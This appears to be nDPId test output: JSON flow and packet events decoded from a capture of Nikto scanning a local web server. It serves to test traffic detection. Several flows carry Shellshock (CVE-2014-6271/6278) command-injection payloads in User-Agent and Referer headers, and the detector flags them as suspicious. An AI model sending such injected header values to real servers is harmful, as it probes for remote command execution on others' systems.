00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277350,"pkt":"AAAAAAAAAAAAAAAACABFAADCI4FAAEAGGLN\/AAABfwAAAcTkH5CTwxvH1PwL8oAYAED+tgAAAQEICp1m\/Y6dZv2OR0VUIC8xMjcwMDEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277350,"flow_last_seen":1576420277350,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277350,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50404,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277352,"pkt":"AAAAAAAAAAAAAAAACABFAADBrJpAAEAGj5p\/AAABfwAAAcTmH5B1JpQjd4rcfoAYAED+tQAAAQEICp1m\/ZCdZv2QR0VUIC9mYXZpY29uLmljbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277352,"flow_last_seen":1576420277352,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277352,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50406,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277354,"pkt":"AAAAAAAAAAAAAAAACABFAADKIPlAAEAGGzN\/AAABfwAAAcToH5DzJBhOnEiKeoAYAED+vgAAAQEICp1m\/ZKdZv2SR0VUIC9mYXZpY29ucy9mYXZpY29uLmljbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277354,"flow_last_seen":1576420277354,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277354,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50408,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277355,"pkt":"AAAAAAAAAAAAAAAACABFAADBHndAAEAGHb5\/AAABfwAAAcTqH5Ag4SbPDIJk5IAYAED+tQAAAQEICp1m\/ZOdZv2TR0VUIC9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277355,"flow_last_seen":1576420277355,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277355,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50410,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_packet_id":1,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277357,"pkt":"AAAAAAAAAAAAAAAACABFAADKgAdAAEAGvCR\/AAABfwAAAcTsH5DBK7i\/eaGnm4AYAED+vgAAAQEICp1m\/ZWdZv2UR0VUIC9mYXZpY29ucy9mYXZpY29uLmdpZiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":434,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277357,"flow_last_seen":1576420277357,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50412,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.gif","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_packet_id":1,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277358,"pkt":"AAAAAAAAAAAAAAAACABFAADByl9AAEAGcdV\/AAABfwAAAcTuH5C2YPLn77QmvYAYAED+tQAAAQEICp1m\/ZadZv2WR0VUIC9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":435,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277358,"flow_last_seen":1576420277358,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277358,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50414,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_packet_id":1,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277359,"pkt":"AAAAAAAAAAAAAAAACABFAADK7Z9AAEAGTox\/AAABfwAAAcTwH5DcrNUiTS0awIAYAED+vgAAAQEICp1m\/ZedZv2XR0VUIC9mYXZpY29ucy9mYXZpY29uLnBuZyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6ZmF2aWNvbikNCg0K"}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277359,"flow_last_seen":1576420277359,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277359,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50416,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/favicons\/favicon.png","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_packet_id":1,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420277361,"pkt":"AAAAAAAAAAAAAAAACABFAAC2klBAAEAGqe9\/AAABfwAAAcTyH5D2pKrzJKNAbIAYAED+qgAAAQEICp1m\/ZmdZv2ZR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmZhdmljb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277361,"flow_last_seen":1576420277361,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420277361,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50418,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:favicon)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277375,"pkt":"AAAAAAAAAAAAAAAACABFAAEBYRtAAEAG2tl\/AAABfwAAAcUGH5Bwr1nakn6kY4AYAED+9QAAAQEICp1m\/aedZv2nR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":438,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277375,"flow_last_seen":1576420277375,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277375,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50438,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_packet_id":1,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277378,"pkt":"AAAAAAAAAAAAAAAACABFAAEBjFVAAEAGr59\/AAABfwAAAcUIH5BgqrSU8g64oYAYAED+9QAAAQEICp1m\/aqdZv2qR0VUIC8gSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277378,"flow_last_seen":1576420277378,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277378,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50440,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277381,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277381,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50442,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":440,"flow_packet_id":1,"flow_last_seen":1576420277381,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277381,"pkt":"AAAAAAAAAAAAAAAACABFAAEKrtxAAEAGjQ9\/AAABfwAAAcUKH5Ddg5Yc5mMQaoAYAED+\/gAAAQEICp1m\/a2dZv2sR0VUIC9hZG1pbi5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
